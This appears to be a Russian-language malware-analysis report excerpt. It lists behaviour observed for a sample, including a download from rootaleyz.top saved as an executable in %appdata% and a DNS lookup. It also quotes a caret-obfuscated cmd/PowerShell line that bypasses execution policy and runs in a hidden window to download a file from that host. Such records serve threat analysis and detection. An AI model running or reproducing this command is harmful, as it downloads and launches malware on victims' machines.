Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwe^rs^hell^.^ex^E ^-ex^eCu^tIo^npOLI^cy ^B^YP^As^s -nOprO^fILE ^-wI^N^d^OwStYL^e^ hiD^D^e^N (N^e^w-oB^j^e^C^T S^ysT^EM.^NET.^WeBCL^iE^nT).dOw^nloAd^fIlE('http://rootaleyz.top/re...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "pOwe^rs^hell^.^ex^E ^-ex^eCu^tIo^npOLI^cy ^B^YP^As^s -nOprO^fILE ^-wI^N^d^OwStYL^e^ hiD^D^e^N (N^e^w-oB^j^e^C^T S^ysT^EM.^NET.^WeBCL^iE^nT).dOw^nloAd^fIlE('http://rootaleyz.top/re...' (со скрытым окном)